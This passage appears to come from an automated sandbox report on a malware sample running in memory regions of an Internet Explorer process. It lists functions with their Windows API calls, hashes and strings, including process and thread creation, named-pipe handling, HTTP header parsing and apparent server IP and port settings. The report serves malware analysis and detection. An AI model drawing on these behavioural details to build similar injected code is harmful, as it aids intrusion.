      • Instruction Fuzzy Hash: 8A713AB1A01249AFDF14DFE8CC84DEEBBB9EF88704B1484A9F515EB210D671AD05DB60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B50807 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92filesynchronizationpipeCOMMON
      Download Yara Rule
      APIs
      • ReadFile.KERNEL32(?,?,00007D32,?,?), ref: 04B50863
      • GetLastError.KERNEL32 ref: 04B5086D
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04B50884
      • ResetEvent.KERNEL32(?), ref: 04B50891
      • ResetEvent.KERNEL32(?), ref: 04B5089C
      • SetEvent.KERNEL32(?), ref: 04B508AF
      • DisconnectNamedPipe.KERNEL32(?), ref: 04B508B8
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Event$Reset$DisconnectErrorFileLastNamedObjectPipeReadSingleWait
      • String ID: "}
      • API String ID: 1515994312-3370080606
      • Opcode ID: abbdadf1dc0f09319d688feb18bc48a460d79bb08213868b77cf6fe64f565859
      • Instruction ID: dea8db01c108f9023b5fdd9fa346d8cdad79e3b238e240e82cb1cfa2d73036d5
      • Opcode Fuzzy Hash: abbdadf1dc0f09319d688feb18bc48a460d79bb08213868b77cf6fe64f565859
      • Instruction Fuzzy Hash: 8F31A071D081089AEB20AF65DC44ABDB7B8EF44704F0005E7E91EE61A0EB38BE45DE51
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B4DD6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
      Download Yara Rule
      APIs
      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 04B4DD80
      • GetProcAddress.KERNEL32(00000000), ref: 04B4DD87
      • GetCurrentProcess.KERNEL32(00000000), ref: 04B4DD97
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: AddressCurrentHandleModuleProcProcess
      • String ID: IsWow64Process$kernel32
      • API String ID: 4190356694-3789238822
      • Opcode ID: 6f5de23bcbea3f58773dcc06918c2421f8e7962813d15d46649852814a9e8b1f
      • Instruction ID: 9988150cbfa436c211a3bfa77d518cb86be2d11c12b9741ecbbbb4726053d58a
      • Opcode Fuzzy Hash: 6f5de23bcbea3f58773dcc06918c2421f8e7962813d15d46649852814a9e8b1f
      • Instruction Fuzzy Hash: 8FE0EC76951229FBCB10ABF89D0DADE7AACEB04695B504196F501E3304D778EE009AB0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300CF0A Relevance: 7.9, APIs: 5, Instructions: 424COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _rand$_free$__getptd_malloc
      • String ID:
      • API String ID: 1020150146-0
      • Opcode ID: e5e19c9e5642ed9727d6ea8c25eb2c70895cf83e07064e10a286444378cfa3eb
      • Instruction ID: 695cd76597b1783c358bfa0f2a8d9e2e8a2594f53214bbbaf7a1abf6d26ccff2
      • Opcode Fuzzy Hash: e5e19c9e5642ed9727d6ea8c25eb2c70895cf83e07064e10a286444378cfa3eb
      • Instruction Fuzzy Hash: 460268759023199FFB64EFA4CC94BEDB7B5BB44301F0445EAD50AAA1E1DB309A84CF21
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B49603 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 257COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ErrorLast
      • String ID: Content-Length: {[0-9]+}$Location: {[0-9]+}$Set-Cookie:\b*{.+?}\n$charset={[A-Za-z0-9\-_]+}
      • API String ID: 1452528299-2371899818
      • Opcode ID: c56ee837aeb73537cc7703b97a1056655506038339425d23a7a6f8a96a0e2a74
      • Instruction ID: 5d3df39ab498393de4959a22a936c6819b9d54e631a92406528523eed4711e9b
      • Opcode Fuzzy Hash: c56ee837aeb73537cc7703b97a1056655506038339425d23a7a6f8a96a0e2a74
      • Instruction Fuzzy Hash: 26818FB1A00208AAEF24EBB9CC84EEEB7B9EFC5754F10016DE515A7191DB70A905DF20
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5A86F Relevance: 7.7, APIs: 5, Instructions: 210COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 463eb27ae0101f7680d9d60e11ec3ee895e3eb05d3754381921ec8dd6857302d
      • Instruction ID: efc28587dec5b5f98d20daa660e884f3e2ed15a6c9a068adfb05c5d24a0ab136
      • Opcode Fuzzy Hash: 463eb27ae0101f7680d9d60e11ec3ee895e3eb05d3754381921ec8dd6857302d
      • Instruction Fuzzy Hash: D871C07190025AEFDF21DFA4C980BBEFBB5FF48314B1446A9E962B7160D7306941CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300BE98 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$_vswprintf_sswprintf
      • String ID:
      • API String ID: 2013425531-0
      • Opcode ID: 4ac68d2a3e230798114dedf08794adf501855c56a8db905d213d5ae080811f08
      • Instruction ID: 4f95e886918efd07e16fe90600be0a9b2aa64037c29f4e16d89f5520a522a5c7
      • Opcode Fuzzy Hash: 4ac68d2a3e230798114dedf08794adf501855c56a8db905d213d5ae080811f08
      • Instruction Fuzzy Hash: 4571F3B680522CAEEB21DB64DC84EDEB7BDEF48210F0401E5E559E6151DA319B94CF60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5B6FE Relevance: 7.6, APIs: 5, Instructions: 98COMMONLIBRARYCODE
      Download Yara Rule
      APIs
        • Part of subcall function 04B65D26: RtlEnterCriticalSection.NTDLL(00000000), ref: 04B65D50
      • RtlDecodePointer.NTDLL(04B76BF8), ref: 04B5B748
      • RtlDecodePointer.NTDLL ref: 04B5B759
        • Part of subcall function 04B5EAB7: RtlEncodePointer.NTDLL(00000000), ref: 04B5EAB9
      • RtlDecodePointer.NTDLL(-00000004), ref: 04B5B77F
      • RtlDecodePointer.NTDLL ref: 04B5B792
      • RtlDecodePointer.NTDLL ref: 04B5B79C
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Pointer$Decode$CriticalEncodeEnterSection
      • String ID:
      • API String ID: 2427772772-0
      • Opcode ID: 6f858f294af5d71ab257386e01d39749a6ff5b24e16576f2e45b4da81ac9c9fa
      • Instruction ID: 0703ee5510f4daecbf0a200f0585b96b914693c05a486c0bf308ba350a0ae12a
      • Opcode Fuzzy Hash: 6f858f294af5d71ab257386e01d39749a6ff5b24e16576f2e45b4da81ac9c9fa
      • Instruction Fuzzy Hash: C931373190434ADFEF119FB8D98479CBAF0FB48314F1045AAD911A72A0DBB8B941CF29
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03003E7F Relevance: 7.6, APIs: 5, Instructions: 93COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Maklocchr$H_prolog3_catch__getptd
      • String ID:
      • API String ID: 743336837-0
      • Opcode ID: 983bab5b0512bb1b8f74f020f94422ed6fd8cf694e6a319630edcd627860d4f0
      • Instruction ID: c43e91c4b2db9d52f3530314e246b59c8bfe9f3e989f1b22c816c432c5185289
      • Opcode Fuzzy Hash: 983bab5b0512bb1b8f74f020f94422ed6fd8cf694e6a319630edcd627860d4f0
      • Instruction Fuzzy Hash: 89313AB9C01388AEDB11EFF9C4409EEBBF8FF48210F04856AE455EB240D3349A448FA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B666EC Relevance: 7.6, APIs: 5, Instructions: 72COMMON
      Download Yara Rule
      APIs
      • GetEnvironmentStringsW.KERNEL32(?,?), ref: 04B666F6
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?), ref: 04B66734
      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?), ref: 04B66757
      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?), ref: 04B6676A
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharEnvironmentMultiStringsWide$Free
      • String ID:
      • API String ID: 1557788787-0
      • Opcode ID: 7f733937975273f3de92b40ad6c5d6ca65df28d4002457f5e83990a4cdc5280c
      • Instruction ID: 58cfe3381e537f50209c8c9f00d04546ee513fd3e4aac9069036901594430dcc
      • Opcode Fuzzy Hash: 7f733937975273f3de92b40ad6c5d6ca65df28d4002457f5e83990a4cdc5280c
      • Instruction Fuzzy Hash: B4117372901224BB9F216FB59C88DBFBFBCEE45390B154492F806D3100EA389E408AF0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301BB57 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
      • String ID:
      • API String ID: 955811338-0
      • Opcode ID: aca4cfe2289a3eabab7f571c5814fbe348beab410cb0d586a146524cce19b1a5
      • Instruction ID: c19e7bfbc44f7080cc86f63a43c6189bdf574dc64facc7bb6c606be7d70c11e9
      • Opcode Fuzzy Hash: aca4cfe2289a3eabab7f571c5814fbe348beab410cb0d586a146524cce19b1a5
      • Instruction Fuzzy Hash: 3F11C67A143714ABE311EBA69CC4EEB77A8EFC5770B140619F5258E5D0CFB1C4218661
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301B9F0 Relevance: 7.6, APIs: 5, Instructions: 63COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
      • String ID:
      • API String ID: 955811338-0
      • Opcode ID: f733bf0927586b9c21f6904405b1e722c0826ea437b17e5c95e99a88cdbb8fbe
      • Instruction ID: 0cd502dfa8f8026717545577a4fcfe3fdba069bb112fef2994ece46798fcc292
      • Opcode Fuzzy Hash: f733bf0927586b9c21f6904405b1e722c0826ea437b17e5c95e99a88cdbb8fbe
      • Instruction Fuzzy Hash: B911E53A146706AFE711EFA4DC849EB7BE8EF84670B004029F9158A190DB71C4218BA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B66783 Relevance: 7.6, APIs: 5, Instructions: 54timethreadCOMMON
      Download Yara Rule
      APIs
      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 04B667BA
      • GetCurrentProcessId.KERNEL32 ref: 04B667C6
      • GetCurrentThreadId.KERNEL32 ref: 04B667CE
      • GetTickCount.KERNEL32 ref: 04B667D6
      • QueryPerformanceCounter.KERNEL32(?), ref: 04B667E2
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
      • String ID:
      • API String ID: 1445889803-0
      • Opcode ID: 7c6d509a71c71d5c974c606543502b3e8d0ec8f25969e03e32dc8eb93d02d740
      • Instruction ID: 9fb9f43f4e77b891b5a935b37fce389b5c8119542590848c2adbf2af70c7e96e
      • Opcode Fuzzy Hash: 7c6d509a71c71d5c974c606543502b3e8d0ec8f25969e03e32dc8eb93d02d740
      • Instruction Fuzzy Hash: 0D112976D002249FDB109FFDD54869EB7F4EF48361F550962D906EB200DB78AD408FA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03002370 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
      Download Yara Rule
      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 0300237D
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 030023C7
      • __CxxThrowException@8.LIBCMT ref: 030023D5
      • std::locale::facet::_Incref.LIBCPMT ref: 030023E5
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 030023EB
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: 09f9d48bcac438c939527bbaa6173e17ade3be65ee7a1129c096f9fb9225c7d7
      • Instruction ID: 54f45e157524df27c4a3ff400c5e4b3144613e2f4f418148bb3de39a8f54c771
      • Opcode Fuzzy Hash: 09f9d48bcac438c939527bbaa6173e17ade3be65ee7a1129c096f9fb9225c7d7
      • Instruction Fuzzy Hash: CA01B13E902618ABDB05F7B4DD449EE776DDFC4624F640525E9016F2C0DF309B068791
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03004538 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
      Download Yara Rule
      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 03004545
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 0300458F
      • __CxxThrowException@8.LIBCMT ref: 0300459D
      • std::locale::facet::_Incref.LIBCPMT ref: 030045AD
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 030045B3
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: d5c824dee08d929fa1dc70b4feecc739d9e21b1f6927e8323ca6b3c08391305e
      • Instruction ID: ea50338fc4cd5d0cef9095a67dd149006fca2fdd2e024e34cb125014626e3f4c
      • Opcode Fuzzy Hash: d5c824dee08d929fa1dc70b4feecc739d9e21b1f6927e8323ca6b3c08391305e
      • Instruction Fuzzy Hash: 9C01B17E902618AADB06F7A5CC409EE77B9DFC0621F640169E6016F2C1DF309B068BD1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 030045C7 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
      Download Yara Rule
      APIs
      • std::_Lockit::_Lockit.LIBCPMT ref: 030045D4
        • Part of subcall function 03001137: std::_Lockit::_Lockit.LIBCPMT ref: 03001148
      • std::bad_exception::bad_exception.LIBCMT ref: 0300461E
      • __CxxThrowException@8.LIBCMT ref: 0300462C
      • std::locale::facet::_Incref.LIBCPMT ref: 0300463C
      • std::locale::facet::_Facet_Register.LIBCPMT ref: 03004642
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_IncrefRegisterThrowstd::bad_exception::bad_exception
      • String ID:
      • API String ID: 4196728576-0
      • Opcode ID: e4f82450981f15ce1ba1b26dcdb35df70b581fe23c22ca7dc015d5a0d9c74c2a
      • Instruction ID: b1b591594bf68d48de839880ade27b41b1ad0f295708ddf952b2eb2ba5a83950
      • Opcode Fuzzy Hash: e4f82450981f15ce1ba1b26dcdb35df70b581fe23c22ca7dc015d5a0d9c74c2a
      • Instruction Fuzzy Hash: 1F01B13E902718AADB06FBA5CC409EE7769DFC0A21F650019E611AF2C0EF309B058B95
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301D7A7 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
      Download Yara Rule
      APIs
      • __getptd_noexit.LIBCMT ref: 0301D7AE
        • Part of subcall function 0301ECBF: ___set_flsgetvalue.LIBCMT ref: 0301ECD1
        • Part of subcall function 0301ECBF: __calloc_crt.LIBCMT ref: 0301ECE5
      • __calloc_crt.LIBCMT ref: 0301D7D0
      • __get_sys_err_msg.LIBCMT ref: 0301D7EE
      • _strcpy_s.LIBCMT ref: 0301D7F6
      • __invoke_watson.LIBCMT ref: 0301D80B
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __calloc_crt$___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
      • String ID:
      • API String ID: 27446768-0
      • Opcode ID: cc8de13b912e155f5b285bd46f8ab87ee0026d1c9da97eaabf396c08645b0e30
      • Instruction ID: dcfe1219e36251a1a8612287d6c94c5ccfad89846b61d59cbdc8aaf4a9fc11ef
      • Opcode Fuzzy Hash: cc8de13b912e155f5b285bd46f8ab87ee0026d1c9da97eaabf396c08645b0e30
      • Instruction Fuzzy Hash: D0F0E0776033546BD720F6255CC49BF73DCCBC1615B14057AF9499B300F565D8608291
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0301DD83 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • __CreateFrameInfo.LIBCMT ref: 0301DDAB
        • Part of subcall function 0301920B: __getptd.LIBCMT ref: 03019219
        • Part of subcall function 0301920B: __getptd.LIBCMT ref: 03019227
      • __getptd.LIBCMT ref: 0301DDB5
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 0301DDC3
      • __getptd.LIBCMT ref: 0301DDD1
      • __getptd.LIBCMT ref: 0301DDDC
        • Part of subcall function 030192B0: __CallSettingFrame@12.LIBCMT ref: 030192FC
        • Part of subcall function 0301DEA9: __getptd.LIBCMT ref: 0301DEB8
        • Part of subcall function 0301DEA9: __getptd.LIBCMT ref: 0301DEC6
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
      • String ID:
      • API String ID: 3282538202-0
      • Opcode ID: 2baf96e4be4c86346ad04d04732bb72bb2641451ca0dbdef8e85c0229348806c
      • Instruction ID: 568d7641777ef4e49ab5fe03c0fc4fb047bda82a9ab98b90dbafb33cc8c38e82
      • Opcode Fuzzy Hash: 2baf96e4be4c86346ad04d04732bb72bb2641451ca0dbdef8e85c0229348806c
      • Instruction Fuzzy Hash: EC11C6B9C01309DFDB00EFA4D845AEDBBB0FF48315F508569E814AB290DB389A61DF61
      Uniqueness

      Uniqueness Score: -1.00%

      Function 030205B0 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
      Download Yara Rule
      APIs
      • __getptd.LIBCMT ref: 030205BC
        • Part of subcall function 0301ED38: __getptd_noexit.LIBCMT ref: 0301ED3B
        • Part of subcall function 0301ED38: __amsg_exit.LIBCMT ref: 0301ED48
      • __getptd.LIBCMT ref: 030205D3
      • __amsg_exit.LIBCMT ref: 030205E1
      • __lock.LIBCMT ref: 030205F1
      • __updatetlocinfoEx_nolock.LIBCMT ref: 03020605
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
      • String ID:
      • API String ID: 938513278-0
      • Opcode ID: e34d1a057c43d271e3191c749b6860becfee648bffc0441adb708c1ebd2b448d
      • Instruction ID: 8a6bf329fd07d9c5672606fde644fabcf9a51bb728f3ec880fcc574ba5c3922f
      • Opcode Fuzzy Hash: e34d1a057c43d271e3191c749b6860becfee648bffc0441adb708c1ebd2b448d
      • Instruction Fuzzy Hash: 28F0907A903734DFE761FB69C80578E7AA06F81720F554609D9546F2C0CF345641CBA6
      Uniqueness

      Uniqueness Score: -1.00%

      Function 03004DB8 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 420COMMON
      Download Yara Rule
      APIs
      • std::locale::facet::_Incref.LIBCPMT ref: 03004E01
        • Part of subcall function 0300116C: std::_Lockit::_Lockit.LIBCPMT ref: 03001178
        • Part of subcall function 030045C7: std::_Lockit::_Lockit.LIBCPMT ref: 030045D4
      • _Maklocchr.LIBCPMT ref: 03004E4C
      • _strcspn.LIBCMT ref: 03004F7C
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_$IncrefMaklocchr_strcspnstd::locale::facet::_
      • String ID: e
      • API String ID: 1200910443-4024072794
      • Opcode ID: f326ef98840cc4be8509d46d12437bd2230c7bd652c0c5fd26a5cede7e60a9c3
      • Instruction ID: 291987b8c6a6c1a4b09cbc6b7b214109b9603aef866db2005ef03edeb0f8fa4f
      • Opcode Fuzzy Hash: f326ef98840cc4be8509d46d12437bd2230c7bd652c0c5fd26a5cede7e60a9c3
      • Instruction Fuzzy Hash: 3A023475D01219AFEF15DFA9CD44AEEBBB9FF08300F044059E905AB2A1D771AA21CF94
      Uniqueness

      Uniqueness Score: -1.00%

      Function 030153A9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 237COMMON
      Download Yara Rule
      APIs
      • __EH_prolog3_catch_GS.LIBCMT ref: 030153B3
        • Part of subcall function 0300CE49: _free.LIBCMT ref: 0300CEAA
      • __CxxThrowException@8.LIBCMT ref: 030156D3
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Exception@8H_prolog3_catch_Throw_free
      • String ID: ($6
      • API String ID: 906823379-4149066357
      • Opcode ID: 7ee744ec6394fb3316395dbbf275ea6708156eea982f92616205eaf157013e2b
      • Instruction ID: 6a6c9938c7c76d33ba6dff5709f89e882b699aaefc393a17ba7219af61b1a904
      • Opcode Fuzzy Hash: 7ee744ec6394fb3316395dbbf275ea6708156eea982f92616205eaf157013e2b
      • Instruction Fuzzy Hash: 7B91F371D00228AFEB219F65CC84BDEBA79FF49350F4081D6F64CAA261CB711E959F60
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0300BA4D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 171COMMON
      Download Yara Rule
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: _memset$_memcpy_s
      • String ID: J
      • API String ID: 288270180-1141589763
      • Opcode ID: eeb157224a60d029665b838213a199b1565ffa1233f7a945ab75ce1be4c66895
      • Instruction ID: 475795891f882efeee60360773db7fc989b8234d893f3f178327e05c35a8551f
      • Opcode Fuzzy Hash: eeb157224a60d029665b838213a199b1565ffa1233f7a945ab75ce1be4c66895
      • Instruction Fuzzy Hash: B4612C75905228AFDF61DF64CC88EEABBB8EB48340F1400E5E5499B261DB31DE85CF50
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B54401 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138COMMON
      Download Yara Rule
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID:
      • String ID: result$serverip$serverport
      • API String ID: 0-1936437466
      • Opcode ID: 912daa96db20b8d670e8809eb503ddfc7bbd46c4a3e7d2e757058ff78b4d4945
      • Instruction ID: 5bb82cd3b569202d580c6e1a0ddbadc683a7a049061762970eb26bd3708148e4
      • Opcode Fuzzy Hash: 912daa96db20b8d670e8809eb503ddfc7bbd46c4a3e7d2e757058ff78b4d4945
      • Instruction Fuzzy Hash: 35416D31A4111AABEB18EB60DC51FEEB778FF59604F0001D5E516A31A0EF747A48DBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B514DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93processCOMMON
      Download Yara Rule
      APIs
      • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04B51521
      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,00000044,?), ref: 04B515DF
      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 04B515F6
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Process$CloseCreateCurrentHandle
      • String ID: D
      • API String ID: 240546133-2746444292
      • Opcode ID: 1731e506f77993d23bcba297bf5abc0242805dd89e77f41c65679ca3fca78dd5
      • Instruction ID: d4618f96e1fc1861c0e0d808be9516874ebdf536baf924bbac6dc56ecf08a9ff
      • Opcode Fuzzy Hash: 1731e506f77993d23bcba297bf5abc0242805dd89e77f41c65679ca3fca78dd5
      • Instruction Fuzzy Hash: 4A31E2F5A012289BDB60DF68CC85BCAB7F8EF48314F4040E5A609E7251D7749A84CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 04B5200A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74threadsleepCOMMON
      Download Yara Rule
      APIs
      • CreateThread.KERNEL32(00000000,00000000,Function_00011BE8,?,00000000,00000000), ref: 04B5208A
      • Sleep.KERNEL32(00000064,?,?,?), ref: 04B52098
      • CreateThread.KERNEL32(00000000,00000000,Function_00011BFF,?,00000000,00000000), ref: 04B520AE
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CreateThread$Sleep
      • String ID: result
      • API String ID: 422425972-325763347
